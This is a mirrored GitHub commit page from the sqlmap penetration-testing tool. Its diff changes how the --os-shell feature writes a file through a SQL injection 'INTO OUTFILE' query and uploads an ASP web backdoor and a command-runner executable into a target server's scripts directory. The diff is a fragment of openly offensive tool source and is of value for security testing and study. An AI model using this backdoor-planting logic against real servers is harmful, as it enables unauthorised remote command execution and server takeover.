Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 24d3e24

Browse files
stamparmstamparm
committed
more updates regarding --os-shell feature
1 parent b558712 commit 24d3e24

2 files changed

Lines changed: 16 additions & 17 deletions

File tree

lib/takeover/web.py

Lines changed: 16 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -111,7 +111,7 @@ def __webFileStreamUpload(self, stream, destFileName, directory):
111111

112112
def __webFileInject(self, fileContent, fileName, directory):
113113
outFile = posixpath.normpath("%s/%s" % (directory, fileName))
114-
uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
114+
uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory)
115115
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
116116
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
117117
query = agent.prefixQuery(" %s" % query)
@@ -200,24 +200,23 @@ def webInit(self):
200200
logger.info(infoMsg)
201201

202202
if self.webApi == "asp":
203-
scriptsDirectory = "Scripts"
204203
runcmdName = "tmpe%s.exe" % randomStr(4)
205204
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
206-
backdoorUploaded = False
207-
for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
208-
backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
209-
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
210-
backdoorStream.file.truncate()
211-
backdoorStream.read()
212-
backdoorStream.seek(0)
213-
backdoorStream.write(backdoorContent)
214-
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
215-
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
216-
self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
217-
self.webDirectory = backdoorDirectory
218-
backdoorUploaded = True
219-
break
220-
if not backdoorUploaded:
205+
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
206+
if match:
207+
backdoorDirectory = match.group(1)
208+
else:
209+
continue
210+
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
211+
backdoorStream.file.truncate()
212+
backdoorStream.read()
213+
backdoorStream.seek(0)
214+
backdoorStream.write(backdoorContent)
215+
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
216+
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
217+
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
218+
self.webDirectory = backdoorDirectory
219+
else:
221220
continue
222221
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
223222
warnMsg = "backdoor hasn't been successfully uploaded "

shell/uploader.asp_

39 Bytes
Binary file not shown.

0 commit comments

Comments
 (0)